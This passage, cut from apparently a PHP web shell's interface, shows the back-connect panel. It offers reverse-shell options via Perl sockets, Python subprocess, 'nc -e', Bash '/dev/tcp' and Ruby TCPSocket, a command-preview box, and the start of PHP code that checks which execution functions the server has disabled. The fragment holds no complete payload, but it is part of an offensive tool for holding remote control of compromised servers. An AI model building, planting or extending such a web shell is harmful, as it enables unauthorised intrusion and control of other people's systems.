>Perl (Socket)</option>
                    <option value="python">Python3 (subprocess)</option>
                    <option value="nc">Netcat (nc -e)</option>
                    <option value="bash">Bash (/dev/tcp)</option>
                    <option value="ruby">Ruby (TCPSocket)</option>
                </select>
            </div>
            <div style="margin-bottom: 10px;">
                <label class="form-label">Command Preview</label>
                <div id="bcPreview" style="background: var(--bg-input); border: 1px solid var(--border); border-radius: 6px; padding: 10px; font-family: monospace; font-size: 10px; color: #00d4ff; word-break: break-all; max-height: 80px; overflow-y: auto; line-height: 1.4;"></div>
            </div>
            <div style="display: flex; gap: 8px; flex-wrap: wrap; margin-bottom: 8px;">
                <span style="font-size: 10px; color: var(--text-muted);">Available exec:</span>
                <?php
                $disabled_fns = array_map(